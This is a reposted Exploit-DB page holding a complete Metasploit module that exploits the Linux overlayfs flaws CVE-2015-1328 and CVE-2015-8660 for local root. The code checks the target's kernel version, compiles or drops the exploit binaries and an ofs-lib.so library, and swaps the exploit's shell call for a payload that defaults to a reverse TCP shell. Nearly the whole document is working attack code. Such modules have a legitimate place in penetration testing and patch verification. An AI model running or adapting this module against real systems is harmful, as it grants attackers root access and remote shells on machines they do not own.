Linux Kernel (Ubuntu / Fedora / RedHat) – ‘Overlayfs’ Local Privilege Escalation (Metasploit)

• Exploit Database
• 35 阅读

• 作者： Metasploit
  日期： 2016-11-02
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/40688/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require "msf/core"
  
  class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
  
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Overlayfs Privilege Escalation',
  'Description'=> %q{
  This module attempts to exploit two different CVEs related to overlayfs.
  CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
  3.16.0-25 (14.10 default) < 3.16.0-41
  3.19.0-18 (15.04 default) < 3.19.0-21
  CVE-2015-8660:
  Ubuntu:
   3.19.0-18 < 3.19.0-43
   4.2.0-18 < 4.2.0-23 (14.04.1, 15.10)
  Fedora:
   < 4.2.8 (vulnerable, un-tested)
  Red Hat:
   < 3.10.0-327 (rhel 6, vulnerable, un-tested)
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'h00die <mike@shorebreaksecurity.com>',# Module
  'rebel' # Discovery
  ],
  'DisclosureDate' => 'Jun 16 2015',
  'Platform' => [ 'linux'],
  'Arch' => [ ARCH_X86, ARCH_X86_64 ],
  'SessionTypes' => [ 'shell', 'meterpreter' ],
  'Targets'=>
  [
  [ 'CVE-2015-1328', { } ],
  [ 'CVE-2015-8660', { } ]
  ],
  'DefaultTarget'=> 1,
  'DefaultOptions' =>
  {
  'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su
  },
  'References' =>
  [
  [ 'EDB', '39166'], # CVE-2015-8660
  [ 'EDB', '37292'], # CVE-2015-1328
  [ 'CVE', '2015-1328'],
  [ 'CVE', '2015-8660']
  ]
  ))
  register_options(
  [
  OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
  OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
  ], self.class)
  end
  
  def check
  def mounts_exist?()
  vprint_status('Checking if mount points exist')
  if target.name == 'CVE-2015-1328'
  if not directory?('/tmp/ns_sploit')
  vprint_good('/tmp/ns_sploit not created')
  return true
  else
  print_error('/tmp/ns_sploit directory exists.Please delete.')
  return false
  end
  elsif target.name == 'CVE-2015-8660'
  if not directory?('/tmp/haxhax')
  vprint_good('/tmp/haxhax not created')
  return true
  else
  print_error('/tmp/haxhax directory exists.Please delete.')
  return false
  end
  end
  end
  
  def kernel_vuln?()
  os_id = cmd_exec('grep ^ID= /etc/os-release')
  case os_id
  when 'ID=ubuntu'
  kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
  case kernel.release.to_s
  when '3.13.0'
  if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic'))
  vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
  return true
  else
  print_error("Kernel #{kernel} is NOT vulnerable")
  return false
  end
  when '3.16.0'
  if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic'))
  vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
  return true
  else
  print_error("Kernel #{kernel} is NOT vulnerable")
  return false
  end
  when '3.19.0'
  if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic'))
  vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328")
  return true
  elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic'))
  vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
  return true
  else
  print_error("Kernel #{kernel} is NOT vulnerable")
  return false
  end
  when '4.2.0'
  if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic'))
  vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660")
  return true
  else
  print_error("Kernel #{kernel} is NOT vulnerable")
  return false
  end
  else
  print_error("Non-vuln kernel #{kernel}")
  return false
  end
  when 'ID=fedora'
  kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the trailer after .fc
  # irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '')
  # => "4.0.4-301"
  if kernel.release < Gem::Version.new('4.2.8')
  vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660.Exploitation UNTESTED")
  return true
  else
  print_error("Non-vuln kernel #{kernel}")
  return false
  end
  else
  print_error("Unknown OS: #{os_id}")
  return false
  end
  end
  
  if mounts_exist?() && kernel_vuln?()
  return CheckCode::Appears
  else
  return CheckCode::Safe
  end
  end
  
  def exploit
  
  if check != CheckCode::Appears
  fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
  end
  
  filename = rand_text_alphanumeric(8)
  executable_path = "#{datastore['WritableDir']}/#{filename}"
  payloadname = rand_text_alphanumeric(8)
  payload_path = "#{datastore['WritableDir']}/#{payloadname}"
  
  def has_prereqs?()
  gcc = cmd_exec('which gcc')
  if gcc.include?('gcc')
  vprint_good('gcc is installed')
  else
  print_error('gcc is not installed.Compiling will fail.')
  end
  return gcc.include?('gcc')
  end
  
  compile = false
  if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
  if has_prereqs?()
  compile = true
  vprint_status('Live compiling exploit on system')
  else
  vprint_status('Dropping pre-compiled exploit on system')
  end
  end
  if check != CheckCode::Appears
  fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
  end
  
  def upload_and_chmod(fname, fcontent, cleanup=true)
  print_status "Writing to #{fname} (#{fcontent.size} bytes)"
  rm_f fname
  write_file(fname, fcontent)
  cmd_exec("chmod +x #{fname}")
  if cleanup
  register_file_for_cleanup(fname)
  end
  end
  
  def on_new_session(session)
  super
  if target.name == 'CVE-2015-1328'
  session.shell_command("/bin/su") #this doesnt work on meterpreter?????
  # we cleanup here instead of earlier since we needed the /bin/su in our new session
  session.shell_command('rm -f /etc/ld.so.preload')
  session.shell_command('rm -f /tmp/ofs-lib.so')
  end
  end
  
  if compile
  begin
  if target.name == 'CVE-2015-1328'
  # direct copy of code from exploit-db.There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
  # Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary.
  path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c')
  fd = ::File.open( path, "rb")
  cve_2015_1328 = fd.read(fd.stat.size)
  fd.close
  
  # pulled out from 1328.c's LIB define
  path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c')
  fd = ::File.open( path, "rb")
  ofs_lib = fd.read(fd.stat.size)
  fd.close
  else
  # direct copy of code from exploit-db.There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
  path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c')
  fd = ::File.open( path, "rb")
  cve_2015_8660 = fd.read(fd.stat.size)
  fd.close
  end
  rescue
  compile = false #hdm said external folder is optional and all module should run even if external is deleted.If we fail to load, default to binaries
  end
  end
  
  
  if compile
  if target.name == 'CVE-2015-1328'
  cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/,
  "execl(\"#{payload_path}\",\"#{payloadname}\",NULL);")
  upload_and_chmod("#{executable_path}.c", cve_2015_1328)
  ofs_path = "#{datastore['WritableDir']}/ofs-lib"
  upload_and_chmod("#{ofs_path}.c", ofs_lib)
  cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file
  register_file_for_cleanup("#{ofs_path}.c")
  else
  cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/,
  "os.execl('#{payload_path}','#{payloadname}')")
  upload_and_chmod("#{executable_path}.c", cve_2015_8660)
  end
  vprint_status("Compiling #{executable_path}.c")
  cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile
  register_file_for_cleanup(executable_path)
  else
  if target.name == 'CVE-2015-1328'
  path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328')
  fd = ::File.open( path, "rb")
  cve_2015_1328 = fd.read(fd.stat.size)
  fd.close
  upload_and_chmod(executable_path, cve_2015_1328)
  
  path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so')
  fd = ::File.open( path, "rb")
  ofs_lib = fd.read(fd.stat.size)
  fd.close
  ofs_path = "#{datastore['WritableDir']}/ofs-lib"
  # dont auto cleanup or else it happens too quickly and we never escalate ourprivs
  upload_and_chmod("#{ofs_path}.so", ofs_lib, false)
  
  # overwrite with the hardcoded variable names in the compiled versions
  payload_filename = 'lXqzVpYN'
  payload_path = '/tmp/lXqzVpYN'
  else
  path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660')
  fd = ::File.open( path, "rb")
  cve_2015_8660 = fd.read(fd.stat.size)
  fd.close
  upload_and_chmod(executable_path, cve_2015_8660)
  # overwrite with the hardcoded variable names in the compiled versions
  payload_filename = '1H0qLaq2'
  payload_path = '/tmp/1H0qLaq2'
  end
  end
  
  upload_and_chmod(payload_path, generate_payload_exe)
  vprint_status('Exploiting...')
  output = cmd_exec(executable_path)
  output.each_line { |line| vprint_status(line.chomp) }
  end
  end